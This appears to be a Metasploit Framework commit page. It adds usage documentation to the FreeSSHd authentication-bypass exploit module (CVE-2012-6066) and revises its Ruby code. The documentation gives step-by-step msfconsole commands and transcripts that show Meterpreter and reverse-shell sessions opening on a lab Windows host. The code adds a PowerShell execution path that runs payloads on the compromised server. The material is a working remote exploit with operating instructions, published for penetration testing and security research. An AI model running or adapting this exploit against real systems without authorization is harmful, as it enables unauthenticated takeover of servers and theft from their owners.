infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #10977, Add documentation and some enhancement to freesshd_authbypass module

4.x
Brent Cook 2018-11-20 11:44:49 -06:00 committed by Metasploit
parent 163d61e9e1
commit b90d79040e
No known key found for this signature in database
GPG Key ID: CDFB5FA52007B954
2 changed files with 131 additions and 21 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

92
documentation/modules/exploit/windows/ssh/freesshd_authbypass.md Normal file
View File

@ -0,0 +1,92 @@
## Description
This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass authentication. You just need the username (which defaults to root). The exploit has been tested with both password and public key authentication.
## Verification
1. Start msfconsole
2. Do : `use exploit/windows/ssh/freesshd_authbypass`
3. Do : `set RHOST [target IP]`
4. Do : `set PAYLOAD [valid windows payload]` if you want to use other payloads (`windows/meterpreter/reverse_tcp` by default)
5. Do : `set LHOST [Your IP]`
6. Do : `set LPORT [valid port]` (port is `4444` by default)
7. Do : `exploit`
8. If target is vulnerable, a shell (`meterpreter` by default) should pop
## Example with default payload (windows/meterpreter/reverse_tcp)
```
msf > use exploit/windows/ssh/freesshd_authbypass
msf exploit(windows/ssh/freesshd_authbypass) > set RHOST 192.168.80.131
RHOST => 192.168.80.131
msf exploit(windows/ssh/freesshd_authbypass) > set LHOST 192.168.80.138
LHOST => 192.168.80.138
msf exploit(windows/ssh/freesshd_authbypass) > exploit
[*] Started reverse TCP handler on 192.168.80.138:4444
[*] 192.168.80.131:22 - Trying username '4Dgifts'
[*] 192.168.80.131:22 - Trying username 'EZsetup'
[*] 192.168.80.131:22 - Trying username 'OutOfBox'
[*] 192.168.80.131:22 - Trying username 'ROOT'
[*] Sending stage (179779 bytes) to 192.168.80.131
[*] Meterpreter session 2 opened (192.168.80.138:4444 -> 192.168.80.131:49166) at 2018-11-16 16:10:33 +0800
meterpreter > sysinfo
Computer : SSH-TEST-SERVER
OS : Windows 8.1 (Build 9600).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter >
```
## Example with plain old reverse shell (windows/shell_reverse_tcp)
```
msf > use exploit/windows/ssh/freesshd_authbypass
msf exploit(windows/ssh/freesshd_authbypass) > set RHOST 192.168.80.131
RHOST => 192.168.80.131
msf exploit(windows/ssh/freesshd_authbypass) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(windows/ssh/freesshd_authbypass) > set LHOST 192.168.80.138
LHOST => 192.168.80.138
msf exploit(windows/ssh/freesshd_authbypass) > set LPORT 4444
LPORT => 4444
msf exploit(windows/ssh/freesshd_authbypass) > exploit
[*] Started reverse TCP handler on 192.168.80.138:4444
[*] 192.168.80.131:22 - Trying username '4Dgifts'
[*] 192.168.80.131:22 - Trying username 'EZsetup'
[*] 192.168.80.131:22 - Trying username 'OutOfBox'
[*] 192.168.80.131:22 - Trying username 'ROOT'
[*] Command shell session 1 opened (192.168.80.138:4444 -> 192.168.80.131:49167) at 2018-11-16 16:12:19 +0800
C:\Windows\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : localdomain
Link-local IPv6 Address . . . . . : fe80::5d22:f345:9ea1:a320%3
IPv4 Address. . . . . . . . . . . : 192.168.80.131
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Tunnel adapter isatap.localdomain:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : localdomain
C:\Windows\system32>hostname
hostname
SSH-TEST-SERVER
C:\Windows\system32>
```

52
modules/exploits/windows/ssh/freesshd_authbypass.rb
View File

@ -3,10 +3,13 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
require 'msf/core/exploit/powershell'
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Powershell
include Msf::Exploit::CmdStager include Msf::Exploit::CmdStager
def initialize(info = {}) def initialize(info = {})
@ -24,24 +27,26 @@ class MetasploitModule < Msf::Exploit::Remote
[ [
'Aris', # Vulnerability discovery and Exploit 'Aris', # Vulnerability discovery and Exploit
'kcope', # 2012 Exploit 'kcope', # 2012 Exploit
'Daniele Martini <cyrax[at]pkcrew.org>' # Metasploit module 'Daniele Martini <cyrax[at]pkcrew.org>', # Metasploit module
'Imran E. Dawoodjee <imrandawoodjee[at]infosec@gmail.com> (minor improvements)' # minor improvements
], ],
'References' => 'References' =>
[ [
[ 'CVE', '2012-6066' ], ['CVE', '2012-6066'],
[ 'OSVDB', '88006' ], ['OSVDB', '88006'],
[ 'BID', '56785' ], ['BID', '56785'],
[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html' ], ['URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html'],
[ 'URL', 'https://seclists.org/fulldisclosure/2010/Aug/132' ] ['URL', 'https://seclists.org/fulldisclosure/2010/Aug/132']
], ],
'Platform' => 'win', 'Platform' => 'win',
'Privileged' => true, 'Privileged' => true,
'DisclosureDate' => "Aug 11 2010",
'Targets' => 'Targets' =>
[ [
[ 'Freesshd <= 1.2.6 / Windows (Universal)', {} ] ['PowerShell', {}],
['CmdStager upload', {}]
], ],
'DefaultTarget' => 0 'DefaultTarget' => 0,
'DisclosureDate' => "Aug 11 2010"
) )
) )
@ -68,7 +73,8 @@ class MetasploitModule < Msf::Exploit::Remote
disconnect disconnect
if banner.match?(/SSH\-2\.0\-WeOnlyDo/) if banner.match?(/SSH\-2\.0\-WeOnlyDo/)
version = banner.split(" ")[1] version = banner.split(" ")[1]
return Exploit::CheckCode::Appears if version.match?(/(2\.1\.3|2\.0\.6)/) return Exploit::CheckCode::Vulnerable if version.match?(/(2\.1\.3|2\.0\.6)/)
return Exploit::CheckCode::Detected return Exploit::CheckCode::Detected
end end
Exploit::CheckCode::Safe Exploit::CheckCode::Safe
@ -80,13 +86,13 @@ class MetasploitModule < Msf::Exploit::Remote
def setup_ssh_options def setup_ssh_options
{ {
:password => rand_text_alpha(8), password: rand_text_alpha(8),
:port => datastore['RPORT'], port: datastore['RPORT'],
:timeout => 1, timeout: 1,
:proxies => datastore['Proxies'], proxies: datastore['Proxies'],
:key_data => OpenSSL::PKey::RSA.new(2048).to_pem, key_data: OpenSSL::PKey::RSA.new(2048).to_pem,
:auth_methods => ['publickey'], auth_methods: ['publickey'],
:verify_host_key => :never verify_host_key: :never
} }
end end
@ -133,19 +139,31 @@ class MetasploitModule < Msf::Exploit::Remote
end end
def exploit def exploit
unless [CheckCode::Vulnerable].include? check
fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!'
end
options = setup_ssh_options options = setup_ssh_options
@connection = nil @connection = nil
each_user do |username| each_user do |username|
next if username.empty? next if username.empty?
@connection = do_login(username, options) @connection = do_login(username, options)
break if @connection break if @connection
end end
if @connection if @connection
case target.name
when 'PowerShell'
print_status('Executing payload via Powershell...')
psh_command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
@connection.exec!("cmd.exe /c " + psh_command)
when 'CmdStager upload'
print_status("Uploading payload, this may take several minutes...") print_status("Uploading payload, this may take several minutes...")
execute_cmdstager(flavor: :vbs, decoder: default_decoder(:vbs), linemax: 1700) execute_cmdstager(flavor: :vbs, decoder: default_decoder(:vbs), linemax: 1700)
end end
end end
end
end end